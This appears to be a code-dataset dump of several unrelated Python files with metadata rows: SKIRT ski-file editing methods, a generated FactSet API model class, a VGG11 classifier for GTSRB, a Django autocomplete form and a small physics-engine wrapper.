def set_binary_tree_dust_grid(self, min_x, max_x, min_y, max_y, min_z, max_z, write_grid=True, min_level=2,
max_level=10, search_method="Neighbor", sample_count=100, max_optical_depth=0,
max_mass_fraction=1e-6, max_dens_disp_fraction=0, direction_method="Alternating",
assigner="IdenticalAssigner"):
# Get the dust grid
grid = self.get_dust_grid()
# Get the parent
parent = grid.getparent()
# Remove the old grid element
parent.remove(grid)
# Create and add the new grid
attrs = {"minX": str(min_x), "maxX": str(max_x), "minY": str(min_y), "maxY": str(max_y), "minZ": str(min_z),
"maxZ": str(max_z), "writeGrid": str_from_bool(write_grid), "minLevel": str(min_level),
"maxLevel": str(max_level), "searchMethod": search_method, "sampleCount": str(sample_count),
"maxOpticalDepth": str(max_optical_depth), "maxMassFraction": str(max_mass_fraction),
"maxDensDispFraction": str(max_dens_disp_fraction), "directionMethod": direction_method}
#"assigner": assigner}
parent.append(parent.makeelement("BinTreeDustGrid", attrs))
## This function sets the maximal optical depth
def set_binary_tree_max_optical_depth(self, value):
# Get the dust grid
grid = self.get_dust_grid()
if grid.tag != "BinTreeDustGrid": raise ValueError("The ski file does not specify a binary tree dust grid")
# Set the optical depth
grid.set("maxOpticalDepth", str(value))
## This function sets the maximal mass fraction
def set_binary_tree_max_mass_fraction(self, value):
# Get the dust grid
grid = self.get_dust_grid()
if grid.tag != "BinTreeDustGrid": raise ValueError("The ski file does not specify a binary tree dust grid")
# Set the max mass fraction
grid.set("maxMassFraction", str(value))
## This function sets an octtree dust grid for the dust system
def set_octtree_dust_grid(self, min_x, max_x, min_y, max_y, min_z, max_z, write_grid=True, min_level=2,
max_level=6, search_method="Neighbor", sample_count=100, max_optical_depth=0,
max_mass_fraction=1e-6, max_dens_disp_fraction=0, barycentric=False,
assigner="IdenticalAssigner"):
# Get the dust grid
grid = self.get_dust_grid()
# Get the parent
parent = grid.getparent()
# Remove the old grid element
parent.remove(grid)
# Create and add the new grid
attrs = {"minX": str(min_x), "maxX": str(max_x), "minY": str(min_y), "maxY": str(max_y), "minZ": str(min_z),
"maxZ": str(max_z), "writeGrid": str_from_bool(write_grid), "minLevel": str(min_level),
"maxLevel": str(max_level), "searchMethod": search_method, "sampleCount": sample_count,
"maxOpticalDepth": str(max_optical_depth), "maxMassFraction": str(max_mass_fraction),
"maxDensDispFraction": str(max_dens_disp_fraction), "barycentric": str_from_bool(barycentric)}
#"assigner": assigner}
parent.append(parent.makeelement("OctTreeDustGrid", attrs))
## This function returns the instrument system
def get_instrument_system(self):
return self.get_unique_base_element("instrumentSystem")
## This function removes the complete instrument system
def remove_instrument_system(self):
instrument_system = self.get_instrument_system()
parent = instrument_system.getparent()
parent.getparent().remove(parent)
## This function returns a list of the instruments in the ski file, or the 'instruments' element if as_list is False
def get_instruments(self, as_list=True):
# Get the instrument system
instrument_system = self.get_instrument_system()
# Get the 'instruments' element
instruments_parents = instrument_system.xpath("instruments")
# Check if only one 'instruments' element is present
if len(instruments_parents) == 0: raise ValueError("No instruments found")
elif len(instruments_parents) > 1: raise ValueError("Invalid ski file: multiple 'instruments' objects within instrument system")
instruments_element = instruments_parents[0]
# Return the instruments as a list
if as_list: return instruments_element.getchildren()
else: return instruments_element
## This function returns the names of all the instruments in the ski file as a list
def get_instrument_names(self):
# Initialize a list to contain the names
names = []
# Get the list of instruments
instruments = self.get_instruments()
# Loop over the instruments
for instrument in instruments:
# Get the instrument name
instrument_name = instrument.get("instrumentName")
# Add the name to the list
names.append(instrument_name)
# Return the list of names
return names
## This function removes the instrument with the specified name
def remove_instrument(self, name):
# Get the instrument with the specified name
instrument = self.get_instrument(name)
# Get element that holds the instrument class
parent = instrument.getparent()
# Remove the instrument
parent.remove(instrument)
## This function removes all instruments
def remove_all_instruments(self):
for name in self.get_instrument_names():
self.remove_instrument(name)
## This function adds an instrument
def add_instrument(self, name, instrument):
from ...modeling.basics.instruments import SEDInstrument, FrameInstrument, SimpleInstrument, FullInstrument
distance = instrument.distance
inclination = instrument.inclination
azimuth = instrument.azimuth
position_angle = instrument.position_angle
if isinstance(instrument, SEDInstrument):
# Add the SED instrument to the ski file
self.add_sed_instrument(name, distance, inclination, azimuth, position_angle)
elif isinstance(instrument, FrameInstrument):
field_x = instrument.field_x
field_y = instrument.field_y
pixels_x = instrument.pixels_x
pixels_y = instrument.pixels_y
center_x = instrument.center_x
center_y = instrument.center_y
# Add the simple instrument to the ski file
self.add_frame_instrument(name, distance, inclination, azimuth, position_angle, field_x, field_y, pixels_x, pixels_y, center_x, center_y)
elif isinstance(instrument, SimpleInstrument):
field_x = instrument.field_x
field_y = instrument.field_y
pixels_x = instrument.pixels_x
pixels_y = instrument.pixels_y
center_x = instrument.center_x
center_y = instrument.center_y
# Add the simple instrument to the ski file
self.add_simple_instrument(name, distance, inclination, azimuth, position_angle, field_x, field_y, pixels_x, pixels_y, center_x, center_y)
elif isinstance(instrument, FullInstrument):
field_x = instrument.field_x
field_y = instrument.field_y
pixels_x = instrument.pixels_x
pixels_y = instrument.pixels_y
center_x = instrument.center_x
center_y = instrument.center_y
# Add the full instrument to the ski file
self.add_full_instrument(name, distance, inclination, azimuth, position_angle, field_x, field_y, pixels_x, pixels_y, center_x, center_y)
else: raise ValueError("Instruments other than SimpleInstrument, SEDInstrument and FullInstrument are not yet supported")
## This function adds a FrameInstrument to the instrument system
def add_frame_instrument(self, name, distance, inclination, azimuth, position_angle, field_x, field_y,
pixels_x, pixels_y, center_x, center_y):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new FrameInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle),
"fieldOfViewX": str(field_x), "fieldOfViewY": str(field_y), "pixelsX": str(pixels_x),
"pixelsY": str(pixels_y), "centerX": str(center_x), "centerY": str(center_y)}
instruments.append(instruments.makeelement("FrameInstrument", attrs))
## This function adds a FullInstrument to the instrument system
def add_full_instrument(self, name, distance, inclination, azimuth, position_angle, field_x, field_y,
pixels_x, pixels_y, center_x, center_y, scattering_levels=0):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new FullInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle), "fieldOfViewX": str(field_x),
"fieldOfViewY": str(field_y), "pixelsX": str(pixels_x), "pixelsY": str(pixels_y),
"centerX": str(center_x), "centerY": str(center_y), "scatteringLevels": str(scattering_levels)}
instruments.append(instruments.makeelement("FullInstrument", attrs))
## This function adds a SimpleInstrument to the instrument system
def add_simple_instrument(self, name, distance, inclination, azimuth, position_angle, field_x, field_y,
pixels_x, pixels_y, center_x, center_y):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new SimpleInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle), "fieldOfViewX": str(field_x),
"fieldOfViewY": str(field_y), "pixelsX": str(pixels_x), "pixelsY": str(pixels_y),
"centerX": str(center_x), "centerY": str(center_y)}
instruments.append(instruments.makeelement("SimpleInstrument", attrs))
## This function adds an SEDInstrument to the instrument system
def add_sed_instrument(self, name, distance, inclination, azimuth, position_angle):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new SEDInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle)}
instruments.append(instruments.makeelement("SEDInstrument", attrs))
## This function returns the instrument with the specified name
def get_instrument(self, name):
# Get the list of instruments
instruments = self.get_instruments()
# Loop over the instruments
for instrument in instruments:
# Get the instrument name
instrument_name = instrument.get("instrumentName")
# If the name matches, return
if name == instrument_name: return instrument
raise ValueError("No instrument with the name '" + name + "'")
## This function changes the name of the specified instrument
def set_instrument_name(self, old_name, new_name):
# Get the instrument with the specified name
instrument = self.get_instrument(old_name)
# Set the new name
instrument.set("instrumentName", new_name)
## This function returns the distance of the specified instrument as an Astropy quantity
def get_instrument_distance(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the distance
return get_quantity(instrument, "distance")
## This function sets the distance of the specified instruments. The distance should be an Astropy quantity.
def set_instrument_distance(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the distance
set_quantity(instrument, "distance", value)
## This function returns the inclination of the specified instrument as an Astropy Angle.
def get_instrument_inclination(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the inclination
return get_quantity(instrument, "inclination")
## This function sets the inclination of the specified instrument. The inclination should be an Astropy Angle or quantity.
def set_instrument_inclination(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the inclination
set_quantity(instrument, "inclination", value)
## This function returns the azimuth angle of the specified instrument as an Astropy Angle.
def get_instrument_azimuth(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the azimuth
return get_quantity(instrument, "azimuth")
## This function sets the azimuth angle of the specified instrument. The angle should be an Astropy Angle or quantity.
def set_instrument_azimuth(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the azimuth angle
set_quantity(instrument, "azimuth", value)
## This function returns the position angle of the specified instrument as an Astropy Angle.
def get_instrument_pa(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the position angle
return get_quantity(instrument, "positionAngle")
## This function sets the position angle of the specified instrument. The angle should be an Astropy Angle or quantity.
def set_instrument_pa(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the position angle
set_quantity(instrument, "positionAngle", value)
## This function sets the orientation of the specified instrument. The angles should be Astropy Angle or Quantity instances.
def set_instrument_orientation(self, name, inclination, position_angle, azimuth):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the inclination
set_quantity(instrument, "inclination", inclination)
set_quantity(instrument, "positionAngle", position_angle)
set_quantity(instrument, "azimuth", azimuth)
## This function sets the orientation of the specified instrument to a face-on orientation.
def set_instrument_orientation_faceon(self, name):
from astropy.coordinates import Angle
# XY plane
inclination = Angle(0., "deg")
position_angle = Angle(90., "deg")
azimuth = Angle(0.0, "deg")
# Set the angles
self.set_instrument_orientation(name, inclination, position_angle, azimuth)
## This function sets the orientation of the specified instrument to an edge-on orientation
def set_instrument_orientation_edgeon(self, name):
from astropy.coordinates import Angle
# XZ plane
inclination = Angle(90., "deg")
position_angle = Angle(0., "deg")
azimuth = Angle(-90., "deg")
# Set the angles
self.set_instrument_orientation(name, inclination, position_angle, azimuth)
## This function returns the size of the specified instrument as a tuple (size_x, size_y)
def get_instrument_size(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the size
return int(instrument.get("pixelsX")), int(instrument.get("pixelsY"))
## This function sets the size of the specified instrument
def set_instrument_size(self, name, x_size, y_size):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the size
instrument.set("pixelsX", str(x_size))
instrument.set("pixelsY", str(y_size))
## This function returns the field of view of the specified instrument as a tuple (field_x, field_y)
def get_instrument_field(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Get the field of view
return get_quantity(instrument, "fieldOfViewX"), get_quantity(instrument, "fieldOfViewY")
## This function sets the field of view of the specified instrument
def set_instrument_field(self, name, x_field, y_field):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the field of view
set_quantity(instrument, "fieldOfViewX", x_field)
set_quantity(instrument, "fieldOfViewY", y_field)
## This (experimental) function converts the ski file structure into a (nested) python dictionary
def to_dict(self):
return recursive_dict(self.tree.getroot())
## This (experimental) function converts the ski file structure into json format
def to_json(self):
"""
This function converts the ski file structure to JSON format
:return:
"""
import json
return json.dumps(self.to_dict())
## This function returns the xml tree element with the specified name that is at the base level of the simulation hierarchy
def get_unique_base_element(self, name):
return get_unique_element(self.tree.getroot(), "//"+name)
# -----------------------------------------------------------------
## This function returns the value of a certain parameter of the specified tree element as an Astropy quantity. The
# default unit can be specified which is used when the unit is not described in the ski file.
def get_quantity(self, element, name, default_unit=None):
# Import Astropy here to avoid import errors for this module for users without an Astropy installation
from astropy.units import Unit
splitted = element.get(name).split()
value = float(splitted[0])
try:
unit = splitted[1]
except IndexError:
unit = default_unit
# Create a quantity object
if unit is not None: value = value * Unit(unit)
return value
# -----------------------------------------------------------------
## This function sets the value of a certain parameter of the specified tree element from an Astropy quantity.
def set_quantity(self, element, name, value, default_unit=None):
# Import Astropy here to avoid import errors for this module for users without an Astropy installation
from astropy.units import Unit
try:
# If this works, assume it is a Quantity (or Angle)
unit = value.unit
# Works for Angles as well (str(angle) gives something that is not 'value + unit')
to_string = str(value.to(value.unit).value) + " " + str(unit)
except AttributeError:
if default_unit is not None:
to_string = str(value) + " " + str(Unit(default_unit))
else:
to_string = str(value) # dimensionless quantity
# Set the value in the tree element
element.set(name, to_string)
# -----------------------------------------------------------------
class LabeledSkiFile(SkiFile):
"""
This class ...
"""
## This function returns all labels
def labels(self):
labels = set()
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Loop over the settings of the element
for setting_name, setting_value in element.items():
if setting_value.startswith("[") and setting_value.endswith("]"):
label = setting_value.split("[")[1].split(":")[0]
labels.add(label)
# Return the list of labels
return list(labels)
# -----------------------------------------------------------------
def labeled_values(self):
"""
This function ...
:return:
"""
values = dict()
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Loop over the settings of the element
for setting_name, setting_value in element.items():
if setting_value.startswith("[") and setting_value.endswith("]"):
label = setting_value.split("[")[1].split(":")[0]
value = self.get_quantity(element, setting_name)
if label in values and values[label] != value: warnings.warn("The '" + label + "' property has different values throughout the SkiFile (" + str(values[label]) + " and " + str(value) + ")")
else: values[label] = value
return values
# -----------------------------------------------------------------
def delabel(self, label):
"""
This function removes the label from a certain property
:param label:
:return:
"""
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Loop over the settings of the element
for setting_name, setting_value in element.items():
if setting_value.startswith("[") and setting_value.endswith("]"):
label_item = setting_value.split("[")[1].split(":")[0]
value_item = setting_value[1:-1].split(":")[1]
if label == label_item: element.set(setting_name, value_item)
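# Illustration (not part of the original source) of the labeling convention handled above:
# a labeled property is stored in the ski file as "[label:value]", for example a hypothetical
# attribute radius="[stellar_radius:1500 pc]". For that attribute, labels() returns
# ['stellar_radius'], labeled_values() maps 'stellar_radius' to the quantity 1500 pc, and
# delabel('stellar_radius') rewrites the attribute value to plain "1500 pc".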
# -----------------------------------------------------------------
# Overwrite the default implementation in SkiFile to incorporate labeled properties
def get_quantity(self, element, name, default_unit=None):
# Import Astropy here to avoid import errors for this module for users without an Astropy installation
from astropy.units import Unit
prop = element.get(name)
if prop.startswith("[") and prop.endswith("]"): prop = prop[1:-1].split(":")[1]
splitted = prop.split()
value = float(splitted[0])
try: unit = splitted[1]
except IndexError: unit = default_unit
# Create a quantity object
if unit is not None: value = value * Unit(unit)
return value
# -----------------------------------------------------------------
# Overwrite the default implementation in SkiFile to incorporate labeled properties
def set_quantity(self, element, name, value, default_unit=None):
pass
# -----------------------------------------------------------------
## This function returns the xml tree element with the specified name that is a child of the specified element
def get_unique_element(element, name):
# Get child element of the given element
parents = element.xpath(name)
# Check if only one child element is present
if len(parents) == 0: raise ValueError("Invalid ski file: no '" + name + "' elements within '" + element.tag + "'")
elif len(parents) > 1: raise ValueError("Invalid ski file: multiple '" + name + "' elements within '" + element.tag + "'")
parents = parents[0]
# Check if only one child object is present
if len(parents) == 0: raise ValueError("Invalid ski file: no '" + name + "' elements within '" + element.tag + "'")
elif len(parents) > 1: raise ValueError("Invalid ski file: multiple '" + name + "' elements within '" + element.tag + "'")
child = parents[0]
# Return the child element
return child
# -----------------------------------------------------------------
def recursive_dict(element):
return element.tag, dict(map(recursive_dict, element)) or element.text
# -----------------------------------------------------------------
def str_from_angle(angle):
try: return str(angle.to("deg").value) + " deg"
except AttributeError: return str(angle)
# -----------------------------------------------------------------
def str_from_quantity(quantity, unit=None):
if unit is not None:
if not quantity.__class__.__name__ == "Quantity": raise ValueError("Value is not a quantity, so unit cannot be converted")
return str(quantity.to(unit).value)
elif quantity.__class__.__name__ == "Quantity":
to_string = str(quantity.value) + " " + str(quantity.unit).replace(" ", "")
return to_string.replace("solMass", "Msun").replace("solLum", "Lsun")
else:
warnings.warn("The given value is not a quantity but a scalar value. No guarantee can be given that the parameter value"
"is specified in the correct unit")
return str(quantity)
# -----------------------------------------------------------------
def str_from_bool(boolean):
return str(boolean).lower()
# -----------------------------------------------------------------
def add_properties(element, dictionary):
for key, value in element.items(): dictionary[key] = value
# -----------------------------------------------------------------
def add_children(element, dictionary):
"""
This function ...
:param element:
:param dictionary:
:return:
"""
dictionary["children"] = dict()
for child in element.getchildren():
dictionary["children"][child.tag] = dict()
add_properties(child, dictionary["children"][child.tag])
add_children(child, dictionary["children"][child.tag])
# -----------------------------------------------------------------
def get_properties(element):
"""
This function ...
:param element:
:return:
"""
properties = dict()
add_properties(element, properties)
add_children(element, properties)
return properties
# -----------------------------------------------------------------
| 42.053465
| 208
| 0.654094
|
017d1e8e2a18720acae8c18a620590c279a3188d
| 11,439
|
py
|
Python
|
code/python/AxiomaEquityOptimizer/v3/fds/sdk/AxiomaEquityOptimizer/model/account_directories.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/AxiomaEquityOptimizer/v3/fds/sdk/AxiomaEquityOptimizer/model/account_directories.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/AxiomaEquityOptimizer/v3/fds/sdk/AxiomaEquityOptimizer/model/account_directories.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
Axioma Equity API
Allow clients to fetch Analytics through APIs. # noqa: E501
The version of the OpenAPI document: 3
Contact: analytics.api.support@factset.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.AxiomaEquityOptimizer.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fds.sdk.AxiomaEquityOptimizer.exceptions import ApiAttributeError
class AccountDirectories(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute;
for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute;
for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'accounts': ([str],), # noqa: E501
'directories': ([str],), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'accounts': 'accounts', # noqa: E501
'directories': 'directories', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""AccountDirectories - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
accounts ([str]): List of account and composite files.. [optional] # noqa: E501
directories ([str]): List of directories.. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""AccountDirectories - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
accounts ([str]): List of account and composite files.. [optional] # noqa: E501
directories ([str]): List of directories.. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 43.827586
| 121
| 0.571728
|
3b99b0ce80c00519fe5f1e5ea1d814642c8b15a0
| 333
|
py
|
Python
|
experiments/GTSRB/net.py
|
k-yossy90229/Distillation-for-mitigating-backdoor-attack
|
691332f54acafbc5e9c4e6495f670805ff622bae
|
[
"MIT"
] | null | null | null |
experiments/GTSRB/net.py
|
k-yossy90229/Distillation-for-mitigating-backdoor-attack
|
691332f54acafbc5e9c4e6495f670805ff622bae
|
[
"MIT"
] | null | null | null |
experiments/GTSRB/net.py
|
k-yossy90229/Distillation-for-mitigating-backdoor-attack
|
691332f54acafbc5e9c4e6495f670805ff622bae
|
[
"MIT"
] | 1
|
2020-12-10T14:14:16.000Z
|
2020-12-10T14:14:16.000Z
|
import torchvision
from torch import nn
def CNV():
CNV = torchvision.models.vgg11(pretrained=False)
CNV.classifier = nn.Sequential(
nn.Linear(25088, 4096),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(4096, 43)
)
return CNV
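# Usage sketch (illustration only, not in the original file): CNV() returns a torchvision VGG11
# with the classifier head replaced for the 43 GTSRB classes. The 25088-unit input of the first
# linear layer corresponds to the standard 224x224 RGB input of torchvision's VGG models.
#
#   model = CNV()
#   # out = model(images), where 'images' is a float tensor of shape (N, 3, 224, 224)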
| 20.8125
| 50
| 0.657658
|
12b7ad33f96c4680823cb5acc33272a0131903f7
| 283
|
py
|
Python
|
test_project/select2_taggit/forms.py
|
epoiate/django-autocomplete-light
|
6cefd5ea73d1ef2c1c800cd1fdcf6cc6fbe27886
|
[
"MIT"
] | 1,368
|
2015-01-03T09:52:33.000Z
|
2022-03-27T09:06:00.000Z
|
test_project/select2_taggit/forms.py
|
epoiate/django-autocomplete-light
|
6cefd5ea73d1ef2c1c800cd1fdcf6cc6fbe27886
|
[
"MIT"
] | 919
|
2015-01-01T05:17:48.000Z
|
2022-03-25T22:41:14.000Z
|
test_project/select2_taggit/forms.py
|
epoiate/django-autocomplete-light
|
6cefd5ea73d1ef2c1c800cd1fdcf6cc6fbe27886
|
[
"MIT"
] | 469
|
2015-01-19T21:40:30.000Z
|
2022-03-26T17:27:40.000Z
|
from dal import autocomplete
from django import forms
from .models import TModel
class TForm(forms.ModelForm):
class Meta:
model = TModel
fields = ('name', 'test')
widgets = {
'test': autocomplete.TaggitSelect2('select2_taggit')
}
| 18.866667
| 64
| 0.621908
|
47f9127686f7375f4975b193e71bc2baf2cb659e
| 1,946
|
py
|
Python
|
build/lib/pie4t/__init__.py
|
beardad1975/pie4t
|
7da08596dc4ac36a8f643cd682a7232623dd17a0
|
[
"MIT"
] | 1
|
2019-12-05T04:10:24.000Z
|
2019-12-05T04:10:24.000Z
|
pie4t/__init__.py
|
beardad1975/pie4t
|
7da08596dc4ac36a8f643cd682a7232623dd17a0
|
[
"MIT"
] | null | null | null |
pie4t/__init__.py
|
beardad1975/pie4t
|
7da08596dc4ac36a8f643cd682a7232623dd17a0
|
[
"MIT"
] | null | null | null |
from . import common
from .engine import PhysicsEngine
物理引擎 = PhysicsEngine
__all__ = [
'add_circle', '新增圓球', '物理引擎',
'simulate', '模擬主迴圈','模擬進行中', '移除',
'add_segment','新增線段','add_box','新增方塊',
]
######## top level function
def add_circle(*args, **kwargs):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.新增圓球(*args, **kwargs)
新增圓球 = add_circle
def add_box(*args, **kwargs):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.新增方塊(*args, **kwargs)
新增方塊 = add_box
def add_segment(*args, **kwargs):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.新增線段(*args, **kwargs)
新增線段 = add_segment
def 移除(obj):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.移除(obj)
def simulate():
if not common.is_engine_created:
PhysicsEngine()
common.stage.simulate()
模擬主迴圈 = simulate
模擬進行中 = simulate
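######## usage sketch (added for illustration, not part of the original module)
# The top-level helpers lazily create a PhysicsEngine on first use and forward their
# arguments to the stage, so a minimal script could look like:
#
#   import pie4t
#   pie4t.add_circle(...)      # arguments are passed through to the stage's 新增圓球
#   pie4t.simulate()           # enters the simulation main loop
#
# The exact arguments accepted by add_circle depend on the stage implementation, which is
# not shown here.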
#def module_init():
# module reference
#__main__.pie4t_module = sys.modules['pie4t']
## check batch mode
# had __file__ and import pie4t in files
# if hasattr(__main__ , '__file__') and __main__.__file__.endswith('py'):
# #print('has __file__')
# try:
# with open(__main__.__file__, encoding='utf8') as f:
# lines = f.readlines()
# for i in lines:
# if 'import' in i and 'pie4t' in i:
# __main__.pie4t_module.is_batch_mode = True
# print(__file__, ': is batch mode,')
# break
# except FileNotFoundError:
# pass
# create game win
#__main__.pie4t_module.game_win = PhysicsEngine()
#__main__.pie4t_module.is_initialized = True
### module init
#module_init()
if __name__ == '__main__' :
pass
| 20.484211
| 77
| 0.584789
|
e90011d268e2ff481a89022509343b146d393d43
| 29,040
|
py
|
Python
|
dask/dataframe/io/parquet/core.py
|
srijan-deepsource/dask
|
0673d9084e02f985f3fdf5ba6ede80e8de5ac15c
|
[
"BSD-3-Clause"
] | 20
|
2015-01-19T14:04:10.000Z
|
2020-01-14T03:43:19.000Z
|
dask/dataframe/io/parquet/core.py
|
srijan-deepsource/dask
|
0673d9084e02f985f3fdf5ba6ede80e8de5ac15c
|
[
"BSD-3-Clause"
] | 12
|
2015-01-22T22:00:43.000Z
|
2020-07-28T19:22:16.000Z
|
dask/dataframe/io/parquet/core.py
|
